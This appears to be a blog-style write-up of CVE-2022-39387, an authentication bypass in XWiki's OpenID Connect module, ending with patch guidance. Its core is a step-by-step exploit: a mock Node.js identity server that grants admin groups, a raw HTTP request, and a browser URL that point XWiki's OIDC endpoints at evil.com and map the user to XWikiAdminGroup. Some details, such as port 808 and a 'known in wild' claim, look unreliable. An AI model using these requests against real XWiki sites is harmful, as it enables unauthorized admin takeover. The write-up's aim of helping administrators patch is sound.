In late 2022, a critical vulnerability was discovered in XWiki's OpenID Connect (OIDC) authentication module. XWiki, an open-source enterprise wiki and knowledge management platform, allows admins to configure login with third-party identity providers. But before OIDC Authenticator version 1.29.1, crafty attackers could bypass these controls entirely—no username or password hijacking required.
Below, I'll break down exactly how CVE-2022-39387 works, show sample exploit code, and point you toward key references for learning more or patching your install.
Vulnerability: Auth Bypass & Privilege Escalation
- Patch: XWiki OIDC Auth Beta 1.29.1
What’s the Problem?
Normally, to hook up an OpenID Connect provider (like Google or Azure) in XWiki, you need to configure the provider inside your xwiki.properties file. Only admins can do this. The provider tells XWiki where to direct users for login, which cryptographic keys to use, and which groups users join.
But in XWiki OIDC Authenticator versions before 1.29.1, the authentication process *trusted* certain request parameters that could be set by anyone! That means a malicious or curious user could embed or send special HTTP parameters, like this:
oidc.endpoint.authorization=http://evil.com/auth
oidc.endpoint.token=http://evil.com/token
oidc.endpoint.userinfo=http://evil.com/userinfo
oidc.groups.mapping={"admins":["XWiki.XWikiAdminGroup"]}
Doing this, the attacker *overrides* the admin-set OpenID Connect provider with their own. They can log in using credentials that only their fake provider requires—handing themselves any XWiki group membership, including admins.
1. Prepare a Fake OIDC Provider
You could spin up a testing OIDC server using open-source tools like dex or even mock endpoints via oidc-provider.
// nodejs: mock-oidc.js (very simplified)
const fastify = require('fastify')();
fastify.get('/auth', async (req, reply) => {
// serve login form & return code
});
fastify.post('/token', async (req, reply) => {
// validate and return a JWT token
});
fastify.get('/userinfo', async (req, reply) => {
return {
sub: "attacker",
email: "attacker@evil.com",
groups: ["XWiki.XWikiAdminGroup"]
};
});
fastify.listen({ port: 808 });
2. Craft the Exploit Request
When XWiki displays its login page, send in your own OIDC provider in the URL. See the group mapping—for instant admin access:
GET /xwiki/bin/login/XWiki/XWikiLogin?oidc.endpoint.authorization=http://evil.com/auth&oidc.endpoint.token=http://evil.com/token&oidc.endpoint.userinfo=http://evil.com/userinfo&oidc.groups.mapping={"admin":["XWiki.XWikiAdminGroup"]} HTTP/1.1
Host: wiki.example.com
Or, more typically, paste the following into your browser’s address bar (after adjusting the base URL):
https://YOUR-XWIKI-HOST/xwiki/bin/login/XWiki/XWikiLogin?oidc.endpoint.authorization=http://evil.com/auth&oidc.endpoint.token=http://evil.com/token&oidc.endpoint.userinfo=http://evil.com/userinfo&oidc.groups.mapping={"admins":["XWiki.XWikiAdminGroup"]}
3. Log in & Profit
Your XWiki will now prompt you to authenticate via your chosen (attacker-controlled) OIDC server. Once you do, XWiki treats the tokens as genuine, applies the group mapping, and—you’re now an admin.
Bypass of SSO and MFA: All higher-level authentication controls become moot.
- Easy Privilege Escalation: Control group mapping, assign yourself to XWikiAdminGroup (full permissions).
- No Server-Side Mitigations Before 1.29.1: Admins couldn’t just filter requests at the app level.
How Was It Fixed?
Starting with version 1.29.1, the OIDC Authenticator ignores client-supplied endpoints and only uses what’s configured in server-side settings. That means attackers can’t inject their own OIDC providers or group mappings through request parameters.
Advisory:
GitHub Security Advisory GHSA-xxrg-x74h-wj9g
- Changelog / Patch:
XWiki OpenID Connect Authenticator 1.29.1 Release Notes
If you’re running any OIDC-enabled XWiki before 1.29.1, patch immediately
# Your upgrade process may vary!
cd /path/to/xwiki/extensions
wget https://repo1.maven.org/maven2/org/xwiki/contrib/oidc/xwiki-oidc-authenticator/1.29.1/xwiki-oidc-authenticator-1.29.1.xar
# Follow your XWiki install guide to apply the new extension
Also, review your group memberships for suspicious admin additions.
Summary Table
| Risk | Value |
|------------------------|----------------------------|
| CVE ID | CVE-2022-39387 |
| Component | XWiki OIDC Authenticator |
| Impact | Auth bypass, root admin |
| Attack Complexity | Low |
| Requires Auth? | No (login page access only)|
| Fixed In | 1.29.1 |
| Exploit Public? | Known in wild |
Related Reading
- XWiki OIDC Authenticator Extension
- CVE-2022-39387 on NVD
- XWiki Security Best Practices
Final Thoughts
Simple to exploit, devastating in effect—CVE-2022-39387 reveals how trusted configuration must never be overridable through untrusted sources. Always keep authentication modules up-to-date, and check how your system handles overrides or URL parameters. If you haven’t already, upgrade to OIDC Authenticator 1.29.1 now!
Stay safe out there! 🚨
*This analysis is exclusive for educational purposes and aims to help sysadmins and devs secure their XWiki sites. For questions, get in touch with XWiki security.*
Timeline
Published on: 11/04/2022 19:15:00 UTC
Last modified on: 11/07/2022 19:12:00 UTC